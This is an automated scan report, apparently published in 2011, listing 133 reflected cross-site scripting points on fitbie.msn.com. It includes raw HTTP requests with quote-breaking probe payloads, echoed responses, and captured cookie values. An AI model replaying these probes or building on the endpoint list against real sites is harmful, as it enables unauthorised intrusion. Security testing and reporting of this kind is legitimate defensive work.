CWE-79, XSS, Cross Site Scripting, fitbie.msn.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Feb 13 08:40:53 CST 2011.

1. Cross-site scripting (reflected)

1.1. http://fitbie.msn.com/cardio/seize-your-saturdays [REST URL parameter 2]

1.2. http://fitbie.msn.com/cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make [REST URL parameter 2]

1.3. http://fitbie.msn.com/fit_tools/daily_calories [REST URL parameter 2]

1.4. http://fitbie.msn.com/fitness-tips/tips/10-bizarre-side-effects-exercise [REST URL parameter 2]

1.5. http://fitbie.msn.com/get-fit/anytime-anywhere-yoga [REST URL parameter 2]

1.6. http://fitbie.msn.com/get-fit/belly-abs [REST URL parameter 2]

1.7. http://fitbie.msn.com/get-fit/cardio [REST URL parameter 2]

1.8. http://fitbie.msn.com/get-fit/men [REST URL parameter 2]

1.9. http://fitbie.msn.com/get-fit/reveal-your-abs-good [REST URL parameter 2]

1.10. http://fitbie.msn.com/get-fit/strength-training [REST URL parameter 2]

1.11. http://fitbie.msn.com/get-fit/walking [REST URL parameter 2]

1.12. http://fitbie.msn.com/get-fit/women [REST URL parameter 2]

1.13. http://fitbie.msn.com/get-fit/yoga [REST URL parameter 2]

1.14. http://fitbie.msn.com/look-and-feel-thinner/3-abs-myths-busted [REST URL parameter 2]

1.15. http://fitbie.msn.com/lose-weight/after [REST URL parameter 2]

1.16. http://fitbie.msn.com/lose-weight/fat-burning-workouts [REST URL parameter 2]

1.17. http://fitbie.msn.com/meal-plan/lose-weight-400-calorie-meals [REST URL parameter 2]

1.18. http://fitbie.msn.com/men/toughness-challenge [REST URL parameter 2]

1.19. http://fitbie.msn.com/misc/drupal.js [REST URL parameter 2]

1.20. http://fitbie.msn.com/misc/favicon.ico [REST URL parameter 2]

1.21. http://fitbie.msn.com/misc/progress.js [REST URL parameter 2]

1.22. http://fitbie.msn.com/modules/node/node.css [REST URL parameter 2]

1.23. http://fitbie.msn.com/modules/system/defaults.css [REST URL parameter 2]

1.24. http://fitbie.msn.com/modules/system/system-menus.css [REST URL parameter 2]

1.25. http://fitbie.msn.com/modules/system/system.css [REST URL parameter 2]

1.26. http://fitbie.msn.com/modules/taxonomy/taxonomy.css [REST URL parameter 2]

1.27. http://fitbie.msn.com/modules/user/user.css [REST URL parameter 2]

1.28. http://fitbie.msn.com/node/4411 [REST URL parameter 2]

1.29. http://fitbie.msn.com/search/bing [REST URL parameter 2]

1.30. http://fitbie.msn.com/sites/all/modules/addtoany/addtoany.css [REST URL parameter 2]

1.31. http://fitbie.msn.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 2]

1.32. http://fitbie.msn.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]

1.33. http://fitbie.msn.com/sites/all/modules/ctools/css/ctools.css [REST URL parameter 2]

1.34. http://fitbie.msn.com/sites/all/modules/date/date.css [REST URL parameter 2]

1.35. http://fitbie.msn.com/sites/all/modules/fbconnect/fbconnect.css [REST URL parameter 2]

1.36. http://fitbie.msn.com/sites/all/modules/fbconnect/fbconnect.js [REST URL parameter 2]

1.37. http://fitbie.msn.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]

1.38. http://fitbie.msn.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 2]

1.39. http://fitbie.msn.com/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 2]

1.40. http://fitbie.msn.com/sites/all/modules/panels/css/panels.css [REST URL parameter 2]

1.41. http://fitbie.msn.com/sites/all/modules/panels/js/panels.js [REST URL parameter 2]

1.42. http://fitbie.msn.com/sites/all/modules/quicktabs/css/quicktabs.css [REST URL parameter 2]

1.43. http://fitbie.msn.com/sites/all/modules/quicktabs/js/quicktabs.js [REST URL parameter 2]

1.44. http://fitbie.msn.com/sites/all/modules/rodale/comments_ajax/comments_ajax.js [REST URL parameter 2]

1.45. http://fitbie.msn.com/sites/all/modules/rodale/fit_tools/css/fit_tools.css [REST URL parameter 2]

1.46. http://fitbie.msn.com/sites/all/modules/rodale/fit_tools/fit_tools.js [REST URL parameter 2]

1.47. http://fitbie.msn.com/sites/all/modules/rodale/fit_tools/tool_helper.js [REST URL parameter 2]

1.48. http://fitbie.msn.com/sites/all/modules/rodale/smartbar/scripts/smartbar.js [REST URL parameter 2]

1.49. http://fitbie.msn.com/sites/all/modules/rodale/smartbar/stylesheets/smartbar.css [REST URL parameter 2]

1.50. http://fitbie.msn.com/sites/all/modules/views/css/views.css [REST URL parameter 2]

1.51. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/cssloader.js [REST URL parameter 2]

1.52. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/fitlife.js [REST URL parameter 2]

1.53. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.browser.min.js [REST URL parameter 2]

1.54. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js [REST URL parameter 2]

1.55. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.jcarousel.min.js [REST URL parameter 2]

1.56. http://fitbie.msn.com/sites/all/themes/fitlife/stylesheets/fitlife.css [REST URL parameter 2]

1.57. http://fitbie.msn.com/sites/all/themes/fitlife/stylesheets/print.css [REST URL parameter 2]

1.58. http://fitbie.msn.com/sites/default/files/200276112-001-TH_0.jpg [REST URL parameter 2]

1.59. http://fitbie.msn.com/sites/default/files/56384394-TH.jpg [REST URL parameter 2]

1.60. http://fitbie.msn.com/sites/default/files/56570375-TH.jpg [REST URL parameter 2]

1.61. http://fitbie.msn.com/sites/default/files/57278017-TH_0.jpg [REST URL parameter 2]

1.62. http://fitbie.msn.com/sites/default/files/6-5-85-04-th_0.jpg [REST URL parameter 2]

1.63. http://fitbie.msn.com/sites/default/files/77292027-th.jpg [REST URL parameter 2]

1.64. http://fitbie.msn.com/sites/default/files/78322433-TH.jpg [REST URL parameter 2]

1.65. http://fitbie.msn.com/sites/default/files/78376830-TH_0.jpg [REST URL parameter 2]

1.66. http://fitbie.msn.com/sites/default/files/78462963-TH.jpg [REST URL parameter 2]

1.67. http://fitbie.msn.com/sites/default/files/80448801-TH_0.jpg [REST URL parameter 2]

1.68. http://fitbie.msn.com/sites/default/files/99812364-th.jpg [REST URL parameter 2]

1.69. http://fitbie.msn.com/sites/default/files/99832032-th.jpg [REST URL parameter 2]

1.70. http://fitbie.msn.com/sites/default/files/MM_chinup_B-male-th_0.jpg [REST URL parameter 2]

1.71. http://fitbie.msn.com/sites/default/files/MM_standard_push_A-male-th_1.jpg [REST URL parameter 2]

1.72. http://fitbie.msn.com/sites/default/files/after-ang-chris-patterson-th.jpg [REST URL parameter 2]

1.73. http://fitbie.msn.com/sites/default/files/after-ang-chris-patterson-th_0.jpg [REST URL parameter 2]

1.74. http://fitbie.msn.com/sites/default/files/after-anthony-henry-th.jpg [REST URL parameter 2]

1.75. http://fitbie.msn.com/sites/default/files/after-aracely-todd-petrich-th.jpg [REST URL parameter 2]

1.76. http://fitbie.msn.com/sites/default/files/after-ben-janet-hankins-th.jpg [REST URL parameter 2]

1.77. http://fitbie.msn.com/sites/default/files/after-kris-sumey-th.jpg [REST URL parameter 2]

1.78. http://fitbie.msn.com/sites/default/files/after-randy-sumey-th.jpg [REST URL parameter 2]

1.79. http://fitbie.msn.com/sites/default/files/belly_off_th_0.jpg [REST URL parameter 2]

1.80. http://fitbie.msn.com/sites/default/files/bicycling_th.jpg [REST URL parameter 2]

1.81. http://fitbie.msn.com/sites/default/files/bride-slim-healthy-th.jpg [REST URL parameter 2]

1.82. http://fitbie.msn.com/sites/default/files/cephas-after-th.jpg [REST URL parameter 2]

1.83. http://fitbie.msn.com/sites/default/files/couple-eating-healthy-th.jpg [REST URL parameter 2]

1.84. http://fitbie.msn.com/sites/default/files/crush-calories-workout-th.jpg [REST URL parameter 2]

1.85. http://fitbie.msn.com/sites/default/files/curtsy-salute-th_1.jpg [REST URL parameter 2]

1.86. http://fitbie.msn.com/sites/default/files/dbell_cross_lunge_B-female-th_1.jpg [REST URL parameter 2]

1.87. http://fitbie.msn.com/sites/default/files/dumb-ly-tri-ext-B-female-th_0.jpg [REST URL parameter 2]

1.88. http://fitbie.msn.com/sites/default/files/ez_ly_tri_ext_A-male-th_1.jpg [REST URL parameter 2]

1.89. http://fitbie.msn.com/sites/default/files/flat_belly_diet_men_th.jpg [REST URL parameter 2]

1.90. http://fitbie.msn.com/sites/default/files/flat_belly_diet_women_th.jpg [REST URL parameter 2]

1.91. http://fitbie.msn.com/sites/default/files/guilty-chocolate-snack-th_0.jpg [REST URL parameter 2]

1.92. http://fitbie.msn.com/sites/default/files/home-workout-dumbbells-th.jpg [REST URL parameter 2]

1.93. http://fitbie.msn.com/sites/default/files/jennie-nickel-after-th.jpg [REST URL parameter 2]

1.94. http://fitbie.msn.com/sites/default/files/kenneth-after-th.jpg [REST URL parameter 2]

1.95. http://fitbie.msn.com/sites/default/files/lat_pull_B-female-th.jpg [REST URL parameter 2]

1.96. http://fitbie.msn.com/sites/default/files/lean-belly-dumbbell-th_1.jpg [REST URL parameter 2]

1.97. http://fitbie.msn.com/sites/default/files/look_better_naked_th.jpg [REST URL parameter 2]

1.98. http://fitbie.msn.com/sites/default/files/mh_personal_trainer_th.jpg [REST URL parameter 2]

1.99. http://fitbie.msn.com/sites/default/files/muscular-man-lifting-dumbbell-th.jpg [REST URL parameter 2]

1.100. http://fitbie.msn.com/sites/default/files/reveal-toned-abs-th.jpg [REST URL parameter 2]

1.101. http://fitbie.msn.com/sites/default/files/rw_5k_training_th.jpg [REST URL parameter 2]

1.102. http://fitbie.msn.com/sites/default/files/rw_half_marathon_th.jpg [REST URL parameter 2]

1.103. http://fitbie.msn.com/sites/default/files/shulah-after-th.jpg [REST URL parameter 2]

1.104. http://fitbie.msn.com/sites/default/files/sing_arm_dbell_swingB-female-th_1.jpg [REST URL parameter 2]

1.105. http://fitbie.msn.com/sites/default/files/slim-woman-posing-th.jpg [REST URL parameter 2]

1.106. http://fitbie.msn.com/sites/default/files/slim_calm_sexy_th.jpg [REST URL parameter 2]

1.107. http://fitbie.msn.com/sites/default/files/stk156319rke-th_0.jpg [REST URL parameter 2]

1.108. http://fitbie.msn.com/sites/default/files/subway-commute-safety-th_0.jpg [REST URL parameter 2]

1.109. http://fitbie.msn.com/sites/default/files/success-after-combo-th.jpg [REST URL parameter 2]

1.110. http://fitbie.msn.com/sites/default/files/thrust_B-female-th_1.jpg [REST URL parameter 2]

1.111. http://fitbie.msn.com/sites/default/files/walk_off_weight_th.jpg [REST URL parameter 2]

1.112. http://fitbie.msn.com/sites/default/files/wh_personal_trainer_th.jpg [REST URL parameter 2]

1.113. http://fitbie.msn.com/sites/default/files/win-the-war-on-fat-th.jpg [REST URL parameter 2]

1.114. http://fitbie.msn.com/sites/default/files/yoga-strength-move-th.jpg [REST URL parameter 2]

1.115. http://fitbie.msn.com/slideshow/10-grab-and-go-fitness-foods [REST URL parameter 2]

1.116. http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring [REST URL parameter 2]

1.117. http://fitbie.msn.com/taxonomy/term/117 [REST URL parameter 2]

1.118. http://fitbie.msn.com/user/login [REST URL parameter 2]

1.119. http://fitbie.msn.com/videos [vid parameter]

1.120. http://fitbie.msn.com/videos/ [vid parameter]

1.121. http://fitbie.msn.com/weight-loss-basics/tips/6-happiest-ways-beat-belly-fat [REST URL parameter 2]

1.122. http://fitbie.msn.com/workout/15-minute-workout-strengthen-your-body-and-mind [REST URL parameter 2]

1.123. http://fitbie.msn.com/workout/3-moves-rev-your-metabolism [REST URL parameter 2]

1.124. http://fitbie.msn.com/workout/bob-harpers-fat-blasting-workout [REST URL parameter 2]

1.125. http://fitbie.msn.com/workout/lose-last-10-pounds [REST URL parameter 2]

1.126. http://fitbie.msn.com/workout/mens-health-muscle-system [REST URL parameter 2]

1.127. http://fitbie.msn.com/workout/muscle-memory-workout [REST URL parameter 2]

1.128. http://fitbie.msn.com/workout/small-changes-big-results [REST URL parameter 2]

1.129. http://fitbie.msn.com/workout/transform-your-body-strength-workout-d [REST URL parameter 2]

1.130. http://fitbie.msn.com/workout/transform-your-body-strength-workout-e [REST URL parameter 2]

1.131. http://fitbie.msn.com/workout/transform-your-body-strength-workout-f [REST URL parameter 2]

1.132. http://fitbie.msn.com/workout/your-instant-beach-body [REST URL parameter 2]

1.133. http://fitbie.msn.com/workouts-men/trimming-tools [REST URL parameter 2]

2. Password field with autocomplete enabled

3. Source code disclosure

4. Cross-domain Referer leakage

4.1. http://fitbie.msn.com/get-fit/anytime-anywhere-yoga

4.2. http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring

4.3. http://fitbie.msn.com/slideshow/why-being-single-better-your-body

4.4. http://fitbie.msn.com/videos

4.5. http://fitbie.msn.com/videos/

5. Cross-domain script include

5.1. http://fitbie.msn.com/

5.2. http://fitbie.msn.com/cardio/seize-your-saturdays

5.3. http://fitbie.msn.com/cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make

5.4. http://fitbie.msn.com/fitness-tips/tips/10-bizarre-side-effects-exercise

5.5. http://fitbie.msn.com/get-fit/anytime-anywhere-yoga

5.6. http://fitbie.msn.com/get-fit/belly-abs

5.7. http://fitbie.msn.com/get-fit/cardio

5.8. http://fitbie.msn.com/get-fit/fitness-tips

5.9. http://fitbie.msn.com/get-fit/men

5.10. http://fitbie.msn.com/get-fit/strength-training

5.11. http://fitbie.msn.com/get-fit/tips/3-get-closer-couple-stretches

5.12. http://fitbie.msn.com/get-fit/tips/6-hard-body-winter-sports

5.13. http://fitbie.msn.com/get-fit/tips/best-workouts-every-mood/tip/4

5.14. http://fitbie.msn.com/get-fit/tips/feel-good-fitness-strategies

5.15. http://fitbie.msn.com/get-fit/walking

5.16. http://fitbie.msn.com/get-fit/women

5.17. http://fitbie.msn.com/get-fit/yoga

5.18. http://fitbie.msn.com/look-and-feel-thinner/3-abs-myths-busted

5.19. http://fitbie.msn.com/look-better-naked-2-day-cleanse

5.20. http://fitbie.msn.com/lose-weight

5.21. http://fitbie.msn.com/lose-weight/after

5.22. http://fitbie.msn.com/lose-weight/fat-burning-workouts

5.23. http://fitbie.msn.com/meal-plan/lose-weight-400-calorie-meals

5.24. http://fitbie.msn.com/men/toughness-challenge

5.25. http://fitbie.msn.com/node/4411

5.26. http://fitbie.msn.com/slideshow/10-grab-and-go-fitness-foods

5.27. http://fitbie.msn.com/slideshow/11-reasons-spring-should-come-sooner

5.28. http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring

5.29. http://fitbie.msn.com/slideshow/30-second-weight-loss-tricks

5.30. http://fitbie.msn.com/slideshow/8-ridiculously-cheap-healthy-foods

5.31. http://fitbie.msn.com/slideshow/9-cutting-edge-abs-exercises

5.32. http://fitbie.msn.com/slideshow/amazing-weight-loss-success

5.33. http://fitbie.msn.com/slideshow/build-perfect-home-gym

5.34. http://fitbie.msn.com/slideshow/food-face

5.35. http://fitbie.msn.com/slideshow/secrets-slim

5.36. http://fitbie.msn.com/slideshow/they-lost-weight-together

5.37. http://fitbie.msn.com/slideshow/why-being-single-better-your-body

5.38. http://fitbie.msn.com/videos

5.39. http://fitbie.msn.com/videos/

5.40. http://fitbie.msn.com/weight-loss-basics/tips/6-happiest-ways-beat-belly-fat

5.41. http://fitbie.msn.com/workout/15-minute-workout-strengthen-your-body-and-mind

5.42. http://fitbie.msn.com/workout/3-moves-rev-your-metabolism

5.43. http://fitbie.msn.com/workout/bob-harpers-fat-blasting-workout

5.44. http://fitbie.msn.com/workout/lose-last-10-pounds

5.45. http://fitbie.msn.com/workout/mens-health-muscle-system

5.46. http://fitbie.msn.com/workout/muscle-memory-workout

5.47. http://fitbie.msn.com/workout/small-changes-big-results

5.48. http://fitbie.msn.com/workout/transform-your-body-strength-workout-d

5.49. http://fitbie.msn.com/workout/transform-your-body-strength-workout-e

5.50. http://fitbie.msn.com/workout/transform-your-body-strength-workout-f

5.51. http://fitbie.msn.com/workout/your-instant-beach-body

5.52. http://fitbie.msn.com/workouts-men/trimming-tools

6. Email addresses disclosed

6.1. http://fitbie.msn.com/contact

6.2. http://fitbie.msn.com/sites/all/modules/quicktabs/js/quicktabs.js

6.3. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.cookie.js

6.4. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js



1. Cross-site scripting (reflected)
There are 133 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://fitbie.msn.com/cardio/seize-your-saturdays [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /cardio/seize-your-saturdays

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cbf1'%3bce4a476e1ed was submitted in the REST URL parameter 2. This input was echoed as 1cbf1';ce4a476e1ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cardio/seize-your-saturdays1cbf1'%3bce4a476e1ed HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:38:14 +0000
ETag: "1297607894-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:38:15 GMT
Date: Sun, 13 Feb 2011 14:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/seize-your-saturdays1cbf1';ce4a476e1ed?destination=node%2Fseize-your-saturdays1cbf1';ce4a476e1ed&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.2. http://fitbie.msn.com/cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeb0b'%3b9001904ad12 was submitted in the REST URL parameter 2. This input was echoed as eeb0b';9001904ad12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cutting-calories/tipseeb0b'%3b9001904ad12/6-food-mistakes-even-healthy-eaters-make HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:37 +0000
ETag: "1297607797-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:38 GMT
Date: Sun, 13 Feb 2011 14:36:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/tipseeb0b';9001904ad12?destination=node%2Ftipseeb0b';9001904ad12&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.3. http://fitbie.msn.com/fit_tools/daily_calories [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /fit_tools/daily_calories

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2bfc'%3b4eaeaddbc3 was submitted in the REST URL parameter 2. This input was echoed as a2bfc';4eaeaddbc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Fri, 11 Feb 2011 21:10:01 +0000
ETag: "1297458601-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Fri, 11 Feb 2011 22:10:01 GMT
Date: Fri, 11 Feb 2011 21:10:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/daily_caloriesa2bfc';4eaeaddbc3?destination=node%2Fdaily_caloriesa2bfc';4eaeaddbc3&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.4. http://fitbie.msn.com/fitness-tips/tips/10-bizarre-side-effects-exercise [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /fitness-tips/tips/10-bizarre-side-effects-exercise

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8434'%3bfe291e813f7 was submitted in the REST URL parameter 2. This input was echoed as c8434';fe291e813f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fitness-tips/tipsc8434'%3bfe291e813f7/10-bizarre-side-effects-exercise HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
